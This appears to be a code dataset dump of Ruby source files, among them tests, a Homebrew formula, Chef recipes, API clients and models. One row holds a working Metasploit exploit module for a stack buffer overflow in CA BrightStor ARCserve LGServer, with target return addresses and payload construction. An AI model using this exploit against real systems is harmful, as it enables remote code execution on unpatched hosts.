hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
387def986b5e63b279b556cdb6d4a0a5c11460d6 | 676 | require "spec_helper"
describe BazaModels::Model::Manipulation do
include DatabaseHelper
let(:user) { User.new(email: "[email protected]") }
let(:role_user) { Role.new(user: user, role: "user") }
let(:role_admin) { Role.new(user: user, role: "administrator") }
it "#created_at" do
expect(user.created_at).to eq nil
user.save!
expect(user.created_at).not_to eq nil
end
it "#updated_at" do
expect(user.updated_at).to eq nil
user.save!
expect(user.updated_at).not_to eq nil
old_updated_at = user.updated_at
sleep 1
user.email = "[email protected]"
user.save!
expect(user.updated_at).not_to eq old_updated_at
end
end
| 25.037037 | 66 | 0.689349 |
87c2fb01fe6542d4d8a74d9b1701d3694a22e317 | 1,715 | class HardlinkOsx < Formula
desc "Command-line utility that implements hardlinks on macOS"
homepage "https://github.com/selkhateeb/hardlink"
url "https://github.com/selkhateeb/hardlink/archive/v0.1.1.tar.gz"
sha256 "5876554e6dafb6627a94670ac33e750a7efeb3a5fbde5ede3e145cdb5131d1ba"
bottle do
sha256 cellar: :any_skip_relocation, mojave: "65636aa5d94437d15de5242711605a07fe6b3b3eebeb8753120555b2a0efe589"
sha256 cellar: :any_skip_relocation, high_sierra: "5d1dca9220c4955c4e4a3b05a23f9c241f9ea73a27ac78d967efdaf29f4d9730"
sha256 cellar: :any_skip_relocation, sierra: "01a3edbdac1385e04a3b0857e8073f0731ee26f6f71746a9c5347458aafc9623"
sha256 cellar: :any_skip_relocation, el_capitan: "edf85db2b0586c410dd96f8ab50cf4cc0f34d1494b3b91a5ef0b00ae16fed3c0"
sha256 cellar: :any_skip_relocation, yosemite: "dcba3e0320ca63d1b958173aa9e2ac24074c5c1f94becaba07f0c92e721b941e"
sha256 cellar: :any_skip_relocation, mavericks: "2ebdf76a67f7c63614d581963d92d79de15cf834b7e3857c139f474db71aab73"
end
def install
system "make"
bin.mkdir
system "make", "install", "PREFIX=#{prefix}"
end
def caveats
<<~EOS
Hardlinks can not be created under the same directory root. If you try to
`hln source directory` to target directory under the same root you will get an error!
Also, remember the binary is named `hln` due to a naming conflict.
EOS
end
test do
mkdir_p "test1/inner"
touch "test1/inner/file"
mkdir "otherdir"
system "#{bin}/hln", "test1", "otherdir/test2"
assert File.directory? "otherdir/test2"
assert File.directory? "otherdir/test2/inner"
assert File.file? "otherdir/test2/inner/file"
end
end
| 41.829268 | 120 | 0.769679 |
01d97f95f312873351971855f348c6eb1684d98a | 3,475 | require 'spec_helper'
require './spec/api_docs/image_hack'
resource "Users" do
let(:user) { users(:admin) }
let(:other_user) { users(:the_collaborator) }
before do
log_in user
end
get "/users" do
pagination
example_request "Get a list of users" do
status.should == 200
end
end
post "/users" do
parameter :username, "Username"
parameter :password, "Password - required unless LDAP authentication is enabled on the server"
parameter :first_name, "First Name"
parameter :last_name, "Last Name"
parameter :email, "E-mail"
parameter :title, "Title"
parameter :dept, "Department"
parameter :notes, "Notes"
parameter :admin, "Make the user an admin. (Only allowed if the authenticated user is an admin)"
required_parameters :username, :first_name, :last_name, :email
let(:username) { "cookiemonster" }
let(:first_name) { "Cookie" }
let(:last_name) { "Monster" }
let(:email) { "[email protected]" }
let(:password) { "secret" }
let(:title) { "Chief Cookie Officer" }
let(:dept) { "jar" }
let(:notes) { "great" }
example_request "Create a user" do
status.should == 201
end
end
get "/users/:id" do
parameter :id, "Id of a user"
required_parameters :id
let(:id) { other_user.id }
example_request "Get a user" do
status.should == 200
end
end
put "/users/:id" do
parameter :id, "Id of a user"
parameter :first_name, "First Name"
parameter :last_name, "Last Name"
parameter :email, "E-mail"
parameter :title, "Title"
parameter :dept, "Department"
parameter :notes, "Notes"
parameter :admin, "Make the user an admin. (Only allowed if the authenticated user is an admin)"
required_parameters :id, :first_name, :last_name, :email
let(:id) { other_user.id }
let(:first_name) { "Big" }
let(:last_name) { "Bird" }
let(:email) { "[email protected]" }
let(:title) { "Cookie manager1" }
let(:dept) { "jar1" }
let(:notes) { "great1" }
let(:admin) { "true" }
example_request "Update a user's details" do
status.should == 200
end
end
delete "/users/:id" do
parameter :id, "Id of a user"
required_parameters :id
let(:id) { other_user.id }
example_request "Delete a user" do
status.should == 200
end
end
get "/users/ldap" do
parameter :username, "Username"
required_parameters :username
let(:username) { other_user.username }
before do
stub(LdapClient).search.with_any_args { [other_user.attributes] }
end
example_request "Search for an LDAP user" do
explanation "This method only works if LDAP is enabled on the server"
status.should == 200
end
end
post "/users/:user_id/image" do
parameter :user_id, "Id of a user"
parameter :files, "Image file"
required_parameters :user_id
let(:user_id) { user.to_param }
let(:files) { [Rack::Test::UploadedFile.new(File.expand_path("spec/fixtures/small2.png", Rails.root), "image/png")] }
example_request "Update a user's profile image" do
status.should == 200
end
end
get "/users/:user_id/image" do
let(:user_id) { users(:owner).to_param }
parameter :user_id, "Id of a user"
parameter :style, "Size of image ( original, icon )"
required_parameters :user_id
example_request "Get a user's profile image" do
status.should == 200
end
end
end
| 24.821429 | 121 | 0.641727 |
f7492be5ef09455216cfb8a8fb9a1d73433ffa12 | 84 | # frozen_string_literal: true
class <%= class_name %>Cache < ApplicationCache
end
| 14 | 47 | 0.761905 |
ff4e654f26993edee508d4f016c91db3a3c4e4af | 2,282 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an
attacker could overflow the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-3216' ],
[ 'OSVDB', '35329' ],
[ 'BID', '24348' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2003 SP0 English', { 'Ret' => 0x71ae1f9b } ],
[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ],
],
'DisclosureDate' => 'Jun 6 2007',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(1900) ], self.class)
end
def check
connect
sock.put("0000000019rxrGetServerVersion")
ver = sock.get_once
disconnect
if ( ver and ver =~ /11\.1\.742/ )
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
data = rand_text_alpha_upper(4108) + [target.ret].pack('V')
data << payload.encoded + rand_text_alpha_upper(rand(300) + 1)
sploit = "0000004820" # Command Length Field
sploit << "rxsUseLicenseIni" # RPC Command
sploit << "~~" # Constant Argument Delimiter
sploit << data
print_status("Trying target #{target.name}...")
# One-shot overwrite...
sock.put(sploit)
handler
disconnect
end
end
| 26.229885 | 104 | 0.563979 |
7ac3b5e151ddb80df64fb1cd5d5f24132e60bd2f | 3,034 | module RComposite
# Layer mode constants
# some of photoshops layer modes are directly equvilent to RMagick
# some are not, and some arent supported at all.
Normal = Magick::OverCompositeOp # PS equivilent
Dissolve = Magick::DissolveCompositeOp
Darken = Magick::DarkenCompositeOp # PS equivilent
Multiply = Magick::MultiplyCompositeOp # PS equivilent
#ColorBurn
#LinearBurn
Lighten = Magick::LightenCompositeOp # PS equivilent
Screen = Magick::ScreenCompositeOp # PS equivilent
#ColorDodge
#LinearDodge
Overlay = Magick::OverlayCompositeOp # PS equivilent
#SoftLight
#HardLight
#VividLight
#LinearLight
#PinLight
#HardMix
Difference = Magick::DifferenceCompositeOp # PS equivilent
#Exclusion
Hue = Magick::HueCompositeOp
Saturation = Magick::SaturateCompositeOp
Color = Magick::ColorizeCompositeOp
Luminosity = Magick::LuminizeCompositeOp
class Layer
attr_accessor :image
attr_reader :offset_x, :offset_y
def initialize(options = {})
if options[:file]
@image = Magick::Image.read(options[:file]).first
@image.background_color = 'transparent'
elsif options[:blob]
@image = Magick::Image.from_blob(options[:blob]).first
@image.background_color = 'transparent'
elsif options[:image]
if options[:image].is_a? Magick::Image
@image = options[:image]
end
end
if @image
#@image.matte = true
@mode = Normal
@offset_x = 0
@offset_y = 0
@opacity_percent = 100
@layer_mask = nil
else
raise "Layer not created -- no layer source."
end
end
def layer_mask(options, &block)
@layer_mask = LayerMask.new options
@layer_mask.instance_eval &block if block_given?
end
def merge_down(image)
@layer_mask.apply self if @layer_mask
image.composite!(@image, @offset_x, @offset_y, @mode)
end
def width
@image.columns
end
def height
@image.rows
end
def offset(x, y)
@offset_x = x
@offset_y = y
end
def rotate(degrees)
@image.rotate!(degrees)
end
def opacity(percent)
@opacity_percent = percent
# intercept original alpha channel with pixel intensity
alpha_channel = @image.channel(Magick::AlphaChannel).negate
intensity = (Magick::MaxRGB * (percent/100.0)).round
alpha_channel.composite!(Magick::Image.new(width, height) { self.background_color = Magick::Pixel.new(intensity,intensity,intensity) }, Magick::CenterGravity, Multiply)
alpha_channel.matte = false
@image.composite!(alpha_channel, Magick::CenterGravity, Magick::CopyOpacityCompositeOp)
return true
end
def mode(mode = nil)
return @mode if mode.nil?
@mode = mode
end
def save_as(filename)
@image.write(filename)
end
def join_set(set)
set.add_layer(self)
end
def leave_set(set)
set.remove_layer(self)
end
end
end
| 25.495798 | 174 | 0.659196 |
f794ce1ff8dc0cfd4fc7790bf6d33c6c70efc852 | 727 | # frozen_string_literal: true
unified_mode true
property :purge_chefdk, [true, false], default: true, description: 'Flag if the chefdk package should be purged before installing chef workstation'
property :add_default_chef_repo, [true, false], default: false, description: 'Flag if the default repo should be added using the codenamephp_chef_repository resource with default parameters'
action :install do
package 'purge chefdk' do
package_name 'chefdk'
action :purge
only_if { new_resource.purge_chefdk }
end
codenamephp_chef_repository 'add chef repository' do
only_if { new_resource.add_default_chef_repo }
end
package 'install chef-workstation' do
package_name 'chef-workstation'
end
end
| 34.619048 | 190 | 0.781293 |
019e6b0f2d808f79146bd28ec15653221640b163 | 2,493 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
include_recipe 'apache2'
include_recipe 'apache2::security-config'
include_recipe 'apache2::rm-index'
include_recipe 'mysql'
include_recipe 'php7'
include_recipe 'php7::module_libapache2'
include_recipe 'php7::module_mysql'
include_recipe 'php7::module_xml'
remote_file '/tmp/wp-cli.phar' do
source node['wordpress']['cli']['url']
action :create
end
# Reference: http://wp-cli.org/#installing
bash 'configure wp cli' do
cwd '/tmp'
code <<-EOH
# Change permissions on the wp-cli.phar file for manipulation
chmod +x wp-cli.phar
# Move wp-cli.phar to complete installation
mv wp-cli.phar /usr/local/bin/wp
EOH
end
execute 'download wordpress' do
cwd '/var/www/html'
command <<-EOH
wp core download \
--version=${version} \
--path=/var/www/html \
--allow-root
EOH
environment({ 'version' => node['wordpress']['version'] })
live_stream true
end
execute 'chown wordpress home' do
command 'chown -R ${user}:${user} /var/www/html'
environment({ 'user' => node['wordpress']['user'] })
end
execute 'create wordpress database' do
command 'mysql -u root -e "CREATE DATABASE ${dbname}"'
environment({ 'dbname' => node['wordpress']['db']['name'] })
end
execute 'a2enmods' do
command 'a2enmod rewrite proxy_fcgi setenvif'
end
execute 'a2enconfs' do
command 'a2enconf php7.0-fpm'
end
template '/etc/apache2/sites-available/wordpress.conf' do
source 'wordpress.conf.erb'
end
execute 'enable wordpress.conf' do
command 'a2ensite wordpress'
end
bash 'edit php.ini' do
user 'root'
code <<-EOH
sed -i 's/memory_limit = .*/memory_limit = 128M/' /etc/php/*/apache2/php.ini
sed -i 's/upload_max_filesize = .*/upload_max_filesize = 100M/' /etc/php/*/apache2/php.ini
sed -i 's/post_max_size = .*/post_max_size = 100M/' /etc/php/*/apache2/php.ini
sed -i 's/max_execution_time = .*/max_execution_time = 120/' /etc/php/*/apache2/php.ini
EOH
end
| 28.329545 | 94 | 0.711592 |
1881ff34aa3f523f0cc8eacafc64c443fb5cd3bd | 7,495 | class SearchStatistic
include Mongoid::Document
include Mongoid::Timestamps
# Search Statistics aggregate a single hour's
# worth of search queries for a single database
#
# This follows a denormalized star schema, with
# a database dimension, a date dimension, and
# a fact table populated by search_queries
field :interval_end, type: DateTime
###################################
# Date Dimension Attributes
###################################
field :year, type: Integer
field :month, type: Integer
field :day, type: Integer
field :hour, type: Integer
field :weekday, type: Integer
###################################
# Database Dimension Attribute
###################################
field :db, type: String
###################################
# Facts
###################################
#
# Number of searches during the interval, by result type
field :n_searches, type: Integer, default: 0 # total number of searches
field :n_zero_result, type: Integer, default: 0 # zero-result searches
field :n_limit_result, type: Integer, default: 0 # searches which hit the limit
#
# Total results during the interval
field :total_results, type: Integer, default: 0 # total results returned by all queries
#
# Aggregate runtime statistics
field :total_time, type: Integer, default: 0
field :max_time, type: Integer, default: 0
#
# Number of searches during the interval, by run time
field :n_time_gt_1s, type: Integer, default: 0 # runtime > 1 second
field :n_time_gt_10s, type: Integer, default: 0 # runtime > 10 seconds
field :n_time_gt_60s, type: Integer, default: 0 # runtime > 1 minute
#
# Number of searches during the interval, by search criteria
field :n_ln, type: Integer, default: 0 # surname searches
field :n_fn, type: Integer, default: 0 # forename searches
field :n_place, type: Integer, default: 0 # specific place searches
field :n_nearby, type: Integer, default: 0 # radius searches
field :n_fuzzy, type: Integer, default: 0 # soundex searches
field :n_inclusive, type: Integer, default: 0 # search additional family member names
field :n_0_county, type: Integer, default: 0 # blank county
field :n_1_county, type: Integer, default: 0 # county (exactly 1)
field :n_multi_county, type: Integer, default: 0 # county (more than 1)
field :n_date, type: Integer, default: 0 # date range
field :n_r_type, type: Integer, default: 0 # record type
index({ interval_end: -1})
index({ year: 1, month: 1, day: 1},{name: "year_month_day",background: true })
def self.calculate
@this_database = self.this_db
num = 0
logger.info 'calculate nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn'
until self.up_to_date?
logger.info 'looping'
stat = SearchStatistic.new
stat.populate
stat.save!
logger.info "stat #{stat.inspect}"
num += 1
#break if num == 2
end
end
def self.up_to_date?
logger.info 'up to date'
freshest_stat_date = SearchStatistic.new.terminus_ad_quem
logger.info "freshest #{freshest_stat_date.inspect}"
last_midnight = Time.utc(Time.now.year, Time.now.month, Time.now.day)
logger.info "last #{last_midnight.inspect}"
result = freshest_stat_date > last_midnight
logger.info "result #{result}"
result
end
def process_query(query)
logger.info 'process_query'
self.n_searches += 1
self.n_zero_result += 1 if query.result_count == 0
self.n_limit_result += 1 if query.result_count == FreeregOptionsConstants::MAXIMUM_NUMBER_OF_RESULTS
self.total_results += (query.result_count || 0)
self.total_time += (query.runtime||0)
self.max_time = query.runtime if (query.runtime||0) > self.max_time
self.n_time_gt_1s += 1 if (query.runtime||0) > 1000
self.n_time_gt_10s += 1 if (query.runtime||0) > 10000
self.n_time_gt_60s += 1 if (query.runtime||0) > 60000
self.n_ln += 1 unless query.last_name.blank?
self.n_fn += 1 unless query.first_name.blank?
self.n_place += 1 unless query.places.empty?
self.n_nearby += 1 if query.search_nearby_places
self.n_fuzzy += 1 if query.fuzzy
self.n_inclusive += 1 if query.inclusive
self.n_0_county += 1 if query.chapman_codes.empty?
self.n_1_county += 1 if query.chapman_codes.size == 1
self.n_multi_county += 1 if query.chapman_codes.size > 1
self.n_date += 1 if query.start_year || query.end_year
self.n_r_type += 1 unless query.record_type.blank?
end
def populate
logger.info 'populate'
populate_dimension
populate_facts
end
def populate_dimension
logger.info 'populate_dimension'
logger.info "Quem @ #{ @terminus_ad_quem.inspect}"
self.db = @this_database
self.year = terminus_ad_quem.year
self.month = terminus_ad_quem.month
self.day = terminus_ad_quem.day
self.hour = terminus_ad_quem.hour
self.weekday = terminus_ad_quem.wday
self.interval_end = terminus_ad_quem
logger.info "pop dim #{self.inspect}"
end
def populate_facts
logger.info 'populate_facts'
matching_queries.each do |q|
process_query(q)
end
end
def matching_queries
logger.info 'matching_queries'
SearchQuery.between(:c_at => terminus_a_quo..terminus_ad_quem)
end
def terminus_ad_quem
logger.info 'terminus_ad_quem'
# increment terminus a quo by 1 hour
@terminus_ad_quem ||= next_hour(terminus_a_quo)
logger.info "Quem class#{@terminus_ad_quem.class.inspect}"
logger.info "Quem #{@terminus_ad_quem}"
@terminus_ad_quem
end
def terminus_a_quo
logger.info 'terminus_a_quo'
# find most recent search_statistic for this database
@terminus_a_quo ||= most_recent_statistic_date || earliest_search_query_date
logger.info "Quo class#{@terminus_a_quo.class.inspect}"
logger.info "Quo #{@terminus_a_quo.inspect}"
@terminus_a_quo
end
def next_hour(prev_datetime)
logger.info 'next_hour'
logger.info "OLd class#{prev_datetime.class.inspect}"
logger.info "OLd #{prev_datetime.inspect}"
new_time = Time.utc(prev_datetime.year, prev_datetime.month, prev_datetime.day, prev_datetime.hour + 1, 0, 0)
logger.info "new time class#{new_time.class.inspect}"
logger.info "new #{new_time.inspect}"
new_time
end
def earliest_search_query_date
logger.info 'earliest_search_query_date'
result = SearchQuery.where(:c_at.ne => nil).asc(:c_at).first.created_at
logger.info "created at class#{result.class.inspect}"
logger.info "created at#{result.inspect}"
result
end
def most_recent_statistic_date
logger.info 'most_recent_statistic_date'
stat = SearchStatistic.where(db: @this_database).asc(:interval_end).last
logger.info "recent stat #{stat.inspect}"
logger.info "interval_end class#{stat.interval_end.class.inspect}" if stat.present?
stat ? stat.interval_end : nil
end
def self.this_db
logger.info 'this_db'
db = Mongoid.clients[SearchQuery.storage_options[:client]][:database]
host = Mongoid.clients[SearchQuery.storage_options[:client]][:hosts].first
if host.match(/localhost/) # most servers use identical mongoid.yml config files
"#{Socket.gethostname}/#{db}"
else
"#{host}/#{db}"
end
end
end
| 35.187793 | 113 | 0.673249 |
8725edee5e76561791613ab8116e7599027e4ff1 | 377 | module Steroids
module Base
class Class
include Steroids::Concerns::Error
class << self
def inherited(subclass)
instance_variables.each do |var|
subclass_variable_value = instance_variable_get(var).dup
subclass.instance_variable_set(var, subclass_variable_value)
end
end
end
end
end
end
| 23.5625 | 72 | 0.639257 |
397184975f5119735be1b43e649f6697ee8b6152 | 1,330 | # Encoding: utf-8
#
# This is auto-generated code, changes will be overwritten.
#
# Copyright:: Copyright 2018, Google Inc. All Rights Reserved.
# License:: Licensed under the Apache License, Version 2.0.
#
# Code generated by AdsCommon library 1.0.1 on 2018-09-20 09:47:26.
require 'ads_common/savon_service'
require 'adwords_api/v201809/feed_item_service_registry'
module AdwordsApi; module V201809; module FeedItemService
class FeedItemService < AdsCommon::SavonService
def initialize(config, endpoint)
namespace = 'https://adwords.google.com/api/adwords/cm/v201809'
super(config, endpoint, namespace, :v201809)
end
def get(*args, &block)
return execute_action('get', args, &block)
end
def get_to_xml(*args)
return get_soap_xml('get', args)
end
def mutate(*args, &block)
return execute_action('mutate', args, &block)
end
def mutate_to_xml(*args)
return get_soap_xml('mutate', args)
end
def query(*args, &block)
return execute_action('query', args, &block)
end
def query_to_xml(*args)
return get_soap_xml('query', args)
end
private
def get_service_registry()
return FeedItemServiceRegistry
end
def get_module()
return AdwordsApi::V201809::FeedItemService
end
end
end; end; end
| 24.181818 | 69 | 0.692481 |
87c33b97eefe68533f1bcd8255704470f912d2fd | 2,130 | =begin
#DocuSign REST API
#The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for SwaggerClient::AccountBillingPlanResponse
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'AccountBillingPlanResponse' do
before do
# run before each test
@instance = SwaggerClient::AccountBillingPlanResponse.new
end
after do
# run after each test
end
describe 'test an instance of AccountBillingPlanResponse' do
it 'should create an instact of AccountBillingPlanResponse' do
expect(@instance).to be_instance_of(SwaggerClient::AccountBillingPlanResponse)
end
end
describe 'test attribute "billing_address"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "billing_address_is_credit_card_address"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "billing_plan"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "credit_card_information"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "referral_information"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "successor_plans"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 29.583333 | 123 | 0.742723 |
e975233ab3e74957f7ba76842d35e23e5a448d6e | 2,564 | # -*- encoding: utf-8 -*-
# stub: guard 2.13.0 ruby lib
Gem::Specification.new do |s|
s.name = "guard".freeze
s.version = "2.13.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Thibaud Guillaume-Gentil".freeze]
s.date = "2015-07-27"
s.description = "Guard is a command line tool to easily handle events on file system modifications.".freeze
s.email = ["[email protected]".freeze]
s.executables = ["guard".freeze, "_guard-core".freeze]
s.files = ["bin/_guard-core".freeze, "bin/guard".freeze]
s.homepage = "http://guardgem.org".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 1.9.3".freeze)
s.rubygems_version = "3.1.0.pre1".freeze
s.summary = "Guard keeps an eye on your file modifications".freeze
s.installed_by_version = "3.1.0.pre1" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<thor>.freeze, [">= 0.18.1"])
s.add_runtime_dependency(%q<listen>.freeze, [">= 2.7", "<= 4.0"])
s.add_runtime_dependency(%q<pry>.freeze, [">= 0.9.12"])
s.add_runtime_dependency(%q<lumberjack>.freeze, ["~> 1.0"])
s.add_runtime_dependency(%q<formatador>.freeze, [">= 0.2.4"])
s.add_runtime_dependency(%q<nenv>.freeze, ["~> 0.1"])
s.add_runtime_dependency(%q<shellany>.freeze, ["~> 0.0"])
s.add_runtime_dependency(%q<notiffany>.freeze, ["~> 0.0"])
else
s.add_dependency(%q<thor>.freeze, [">= 0.18.1"])
s.add_dependency(%q<listen>.freeze, [">= 2.7", "<= 4.0"])
s.add_dependency(%q<pry>.freeze, [">= 0.9.12"])
s.add_dependency(%q<lumberjack>.freeze, ["~> 1.0"])
s.add_dependency(%q<formatador>.freeze, [">= 0.2.4"])
s.add_dependency(%q<nenv>.freeze, ["~> 0.1"])
s.add_dependency(%q<shellany>.freeze, ["~> 0.0"])
s.add_dependency(%q<notiffany>.freeze, ["~> 0.0"])
end
else
s.add_dependency(%q<thor>.freeze, [">= 0.18.1"])
s.add_dependency(%q<listen>.freeze, [">= 2.7", "<= 4.0"])
s.add_dependency(%q<pry>.freeze, [">= 0.9.12"])
s.add_dependency(%q<lumberjack>.freeze, ["~> 1.0"])
s.add_dependency(%q<formatador>.freeze, [">= 0.2.4"])
s.add_dependency(%q<nenv>.freeze, ["~> 0.1"])
s.add_dependency(%q<shellany>.freeze, ["~> 0.0"])
s.add_dependency(%q<notiffany>.freeze, ["~> 0.0"])
end
end
| 44.982456 | 112 | 0.631435 |
1d6b39a7831d44d28299d0e174681f7e82266024 | 7,903 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Ci::Reports::TestSuite do
include TestReportsHelper
let(:test_suite) { described_class.new('Rspec') }
let(:test_case_success) { create_test_case_rspec_success }
let(:test_case_failed) { create_test_case_rspec_failed }
let(:test_case_skipped) { create_test_case_rspec_skipped }
let(:test_case_error) { create_test_case_rspec_error }
it { expect(test_suite.name).to eq('Rspec') }
describe '#add_test_case' do
context 'when status of the test case is success' do
it 'stores data correctly' do
test_suite.add_test_case(test_case_success)
expect(test_suite.test_cases[test_case_success.status][test_case_success.key])
.to eq(test_case_success)
expect(test_suite.total_time).to eq(1.11)
end
end
context 'when status of the test case is failed' do
it 'stores data correctly' do
test_suite.add_test_case(test_case_failed)
expect(test_suite.test_cases[test_case_failed.status][test_case_failed.key])
.to eq(test_case_failed)
expect(test_suite.total_time).to eq(2.22)
end
end
context 'when two test cases are added' do
it 'sums up total time' do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
expect(test_suite.total_time).to eq(3.33)
end
end
end
describe '#total_count' do
subject { test_suite.total_count }
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
test_suite.add_test_case(test_case_skipped)
test_suite.add_test_case(test_case_error)
end
it { is_expected.to eq(4) }
end
describe '#total_status' do
subject { test_suite.total_status }
context 'when all test cases succeeded' do
before do
test_suite.add_test_case(test_case_success)
end
it { is_expected.to eq(Gitlab::Ci::Reports::TestCase::STATUS_SUCCESS) }
end
context 'when a test case failed' do
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
end
it { is_expected.to eq(Gitlab::Ci::Reports::TestCase::STATUS_FAILED) }
end
context 'when a test case errored' do
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_error)
end
it { is_expected.to eq(Gitlab::Ci::Reports::TestCase::STATUS_FAILED) }
end
end
describe '#with_attachment' do
subject { test_suite.with_attachment! }
context 'when test cases do not contain an attachment' do
let(:test_case) { build(:report_test_case, :failed)}
before do
test_suite.add_test_case(test_case)
end
it 'returns an empty hash' do
expect(subject).to be_empty
end
end
context 'when test cases contain an attachment' do
let(:test_case_with_attachment) { build(:report_test_case, :failed_with_attachment)}
before do
test_suite.add_test_case(test_case_with_attachment)
end
it 'returns failed test cases with attachment' do
expect(subject.count).to eq(1)
expect(subject['failed']).to be_present
end
end
end
describe '#set_suite_error' do
let(:set_suite_error) { test_suite.set_suite_error('message') }
context 'when @suite_error is nil' do
it 'returns message' do
expect(set_suite_error).to eq('message')
end
it 'sets the new message' do
set_suite_error
expect(test_suite.suite_error).to eq('message')
end
end
context 'when a suite_error has already been set' do
before do
test_suite.set_suite_error('old message')
end
it 'overwrites the existing message' do
expect { set_suite_error }.to change(test_suite, :suite_error).from('old message').to('message')
end
end
end
describe '#+' do
let(:test_suite_2) { described_class.new('Rspec') }
subject { test_suite + test_suite_2 }
context 'when adding multiple suites together' do
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
end
it 'returns a new test suite' do
expect(subject).to be_an_instance_of(described_class)
end
it 'returns the suite name' do
expect(subject.name).to eq('Rspec')
end
it 'returns the sum for total_time' do
expect(subject.total_time).to eq(3.33)
end
it 'merges tests cases hash', :aggregate_failures do
test_suite_2.add_test_case(create_test_case_java_success)
failed_keys = test_suite.test_cases['failed'].keys
success_keys = test_suite.test_cases['success'].keys + test_suite_2.test_cases['success'].keys
expect(subject.test_cases['failed'].keys).to contain_exactly(*failed_keys)
expect(subject.test_cases['success'].keys).to contain_exactly(*success_keys)
end
end
end
describe '#sorted' do
subject { test_suite.sorted }
context 'when there are multiple failed test cases' do
before do
test_suite.add_test_case(create_test_case_rspec_failed('test_spec_1', 1.11))
test_suite.add_test_case(create_test_case_rspec_failed('test_spec_2', 4.44))
end
it 'returns test cases sorted by execution time desc' do
expect(subject.test_cases['failed'].each_value.first.execution_time).to eq(4.44)
expect(subject.test_cases['failed'].values.second.execution_time).to eq(1.11)
end
end
context 'when there are multiple test cases' do
let(:status_ordered) { %w(error failed success skipped) }
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
test_suite.add_test_case(test_case_error)
test_suite.add_test_case(test_case_skipped)
end
it 'returns test cases sorted by status' do
expect(subject.test_cases.keys).to eq(status_ordered)
end
end
end
Gitlab::Ci::Reports::TestCase::STATUS_TYPES.each do |status_type|
describe "##{status_type}" do
subject { test_suite.public_send("#{status_type}") }
context "when #{status_type} test case exists" do
before do
test_suite.add_test_case(public_send("test_case_#{status_type}"))
end
it 'returns all success test cases' do
is_expected.to eq( { public_send("test_case_#{status_type}").key => public_send("test_case_#{status_type}") })
end
end
context "when #{status_type} test case do not exist" do
it 'returns nothing' do
is_expected.to be_empty
end
end
end
end
describe '#each_test_case' do
before do
test_suite.add_test_case(test_case_success)
test_suite.add_test_case(test_case_failed)
test_suite.add_test_case(test_case_skipped)
test_suite.add_test_case(test_case_error)
end
it 'yields each test case to given block' do
expect { |b| test_suite.each_test_case(&b) }
.to yield_successive_args(test_case_success, test_case_failed, test_case_skipped, test_case_error)
end
end
Gitlab::Ci::Reports::TestCase::STATUS_TYPES.each do |status_type|
describe "##{status_type}_count" do
subject { test_suite.public_send("#{status_type}_count") }
context "when #{status_type} test case exists" do
before do
test_suite.add_test_case(public_send("test_case_#{status_type}"))
end
it 'returns the count' do
is_expected.to eq(1)
end
end
